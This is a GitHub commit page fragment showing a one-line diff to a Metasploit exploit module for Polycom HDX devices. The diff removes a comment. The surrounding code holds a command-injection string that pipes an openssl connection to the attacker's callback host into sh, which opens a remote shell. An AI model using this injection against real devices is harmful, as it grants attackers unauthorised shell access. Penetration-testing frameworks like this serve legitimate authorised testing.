We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent 829a7a5 commit 676a08bCopy full SHA for 676a08b
modules/exploits/unix/misc/polycom_hdx_traceroute_exec.rb
@@ -105,7 +105,6 @@ def do_payload(sock)
105
106
# Figure out the port we picked
107
cbport = self.service.getsockname[2]
108
- # Utilize ping OS injection to push cmd payload using stager optimized for limited buffer < 128
109
cmd = "devcmds\nlan traceroute `openssl${IFS}s_client${IFS}-quiet${IFS}-host${IFS}#{cbhost}${IFS}-port${IFS}#{cbport}|sh`\n"
110
sock.put(cmd)
111
if datastore['VERBOSE']
0 commit comments